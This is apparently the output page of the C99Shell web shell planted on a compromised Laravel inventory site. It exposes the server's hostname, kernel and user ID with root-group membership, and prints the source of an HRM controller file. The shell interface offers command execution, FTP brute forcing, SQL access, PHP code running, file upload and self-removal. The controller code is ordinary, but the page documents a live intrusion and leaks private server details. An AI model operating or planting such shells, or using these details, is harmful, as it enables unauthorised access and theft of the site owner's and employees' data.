!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/app/Http/Controllers/hrm/   drwxr-xr-x
Free 29.06 GB of 117.98 GB (24.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CoreController.php (1.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Http\Controllers\hrm;
use 
App\Http\Controllers\Controller;

use 
App\Models\Employee;
use 
App\Models\Company;
use 
App\Models\Designation;
use 
App\Models\EmployeeExperience;
use 
App\Models\EmployeeDocument;
use 
App\Models\EmployeeAccount;
use 
App\Models\Department;
use 
App\Models\OfficeShift;
use 
App\Models\Leave;
use 
App\Models\LeaveType;
use 
App\Models\Award;
use 
App\Models\Travel;
use 
App\Models\Complaint;
use 
App\Models\Project;
use 
App\Models\Task;
use 
App\Models\Training;
use 
App\utils\helpers;
use 
Carbon\Carbon;
use 
DB;
use 
Illuminate\Http\Request;

class 
CoreController extends Controller
{

    public function 
Get_designations_by_department(Request $request)
    {
        
$designations Designation::where('department_id' $request->id)->where('deleted_at''='null)->get();

        return 
response()->json($designations);
    }

    public function 
Get_departments_by_company(Request $request)
    {
        
$departments Department::where('company_id' $request->id)->where('deleted_at''='null)->get();

        return 
response()->json($departments);
    }

    public function 
Get_office_shift_by_company(Request $request)
    {
        
$office_shifts OfficeShift::where('company_id' $request->id)->where('deleted_at''='null)->get(['id','name']);

        return 
response()->json($office_shifts);
    }

    public function 
Get_employees_by_company(Request $request)
    {
        
$employees Employee::where('company_id' $request->id)->where('deleted_at''='null)->get(['id','username']);

        return 
response()->json($employees);
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--